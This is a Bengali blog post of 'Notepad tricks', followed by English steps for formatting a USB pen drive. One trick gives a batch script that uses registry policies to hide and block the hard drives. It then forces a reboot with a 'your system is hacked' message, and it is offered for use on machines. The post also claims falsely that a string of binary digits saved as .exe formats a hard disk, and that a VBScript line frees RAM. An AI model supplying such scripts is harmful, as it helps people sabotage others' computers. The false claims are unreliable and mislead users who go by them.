আসসালামু আলাইকুম

শুক্রবার, ১৩ এপ্রিল, ২০১২

Notepad এর কিছু Exclusive Tips.(না দেখলে অনেক কিছু Miss করবেন)

কেমন আছেন সবাই সবাই?আশা করি ভাল আছেন।আজ আপনাদের জন্য যে টিউনটি করব সেটি আপনাদের অনেক কাজে লাগবে কিন্তু কারো ক্ষতি করবেন না।

নোটপ্যাড ব্যবহার করে Hard disk drive ফরমেট করুন।
প্রথমে Notepad Open করে নিচের কোডটি লিখুন:
01001011000111110010010101010101010000011111100000
এবার এটিকে Format your HDD.exe বা আপনার ইচ্ছামত নাম ব্যবহার করতে পারেন কিন্তু অবশ্যই .exe এক্সটেনশনে save করতে হবে।এবার এটিকে রান করালে আপনার Hard disk drive format হয়ে যাবে।

Hard disk Disable করুন নোটপ্যাড ব্যবহার করে।
প্রথমে Notepad Open করে নিচের কোডটি লিখুন:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \”Sorry Your System is hacked by us!\” -f
এবার একে Disable hard disk.bat নামে সেভ করুন।এই ফাইলটি রান করালে আপনার Computer এর Hard disk disable হয়ে যাবে।

নোটপ্যাডের মাধ্যমে RAM Clean করে আপনার কম্পিউটারের স্পিড বাড়ান।
আমাদের Computer এ যখন অনেক প্রোগ্রাম একসাথে তখন আমাদের কম্পিউটার বেশ Slow কাজ করে।এর প্রধান কারন হল RAM.কারন,যখন অনেক প্রোগ্রাম একসাথে চলে তখন RAM Full হয়ে যায়।এ অবস্থায় আমরা RAM কিছুটা Clean করে Computer এর Speed বাড়াতে পারি।সুতরাং আমাদেরকে যা করতে হবে তাহল,নোটপ্যাড ওপেন করে নিচের Command টি লিখতে হবে:
FreeMem=Space(64000000)
এবার একে যেকোন ফাইল নেম দিয়ে .vbs ফাইল হিসেবে সেভ করুন।এবার ফাইলটিকে রান করালে কিছুটা RAM Clean হবে এবং আপনার Computer টি দ্রুত কাজ করবে।
এছাড়াও আপনি যদি আরও মেমরি ক্লিন করতে চান তবে নিচের Command গুলো দেখুন:
FreeMem= (256000000) for 256 mb
FreeMem= (128000000) for 128 mb
FreeMem= (72000000) for 72 mb
FreeMem= (64000000) for 64 mb
FreeMem= (32000000) for 32 mb
FreeMem= (24000000) for 24 mb
লক্ষ্য রাখবেন আপনার Command কৃত মেমরি RAM এর মেমরি থেকে বেশি না হয়।ধন্যবাদ।

how to format a pendrive using command prompt

1) (skip the format, just unhide them)

Open a dos prompt (Start >> Run >> cmd) and type:
attrib -r -h -s ./s x:\*.*
This will change the attributes of all of the files on the pen drive. Readonly, hidden, and system attributes will be removed. Replace the X: with your pen drive's drive letter. Now you will be able to see them in Explorer, and delete them, without formatting anything.

2) (format with DOS commands)

Open the DOS prompt (Start >> Run >> cmd)
Type:
FORMAT X: /FS:FAT32 /Q /V:PenDrive
This will reformat the Pen drive, using the FAT32 file system, and label the drive PenDrive. Replace X: with the actual drive letter of your Pen Drive. For more help on this command, type:
FORMAT /?
at the command prompt.


3) (format using Windows GUI, Explorer)

Open Explorer, go to My Computer, right click on the drive letter and select Format... from the popup menu. Pen drives are usually formatted with the FAT32 file system, but if you're of a mind, you can also use NTFS. But keep in mind, if you use NTFS you won't be able to take the pen drive out, without a reboot.

How to Format a Virus Infected Pen drive Using Command Prompt

This simple format trick allows you to to format a virus infected pen drive using command prompt in windows. There may be certain occasions where you cant format you pendrive by right clicking and select format. Because simply the virus script inside the pendrive do not allow such things. If you try to delete the virus file .exe like autorun.exe itself, it may return immediately because the virus program is a tricky one.

However most of the time, a pen drive format using cmd will delete the virus file permanently by means. So here's the steps to format a pendrive using command prompt window.



First, insert your thum drive into the usb port
Open my computer and find out the drive specification letter for your usb drive. For example, in my case it's H:



Open command prompt ( start>>Run = "cmd" without quotes )



Type format"your drive letter" and press Enter twice | in my case,

C:\Documents and Settings\Tomin>format h:

Now the command prompt setup will verify the file system and ask you to enter a name for your drive - Volume label



After giving a volume label, press Enter



You're now done.

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More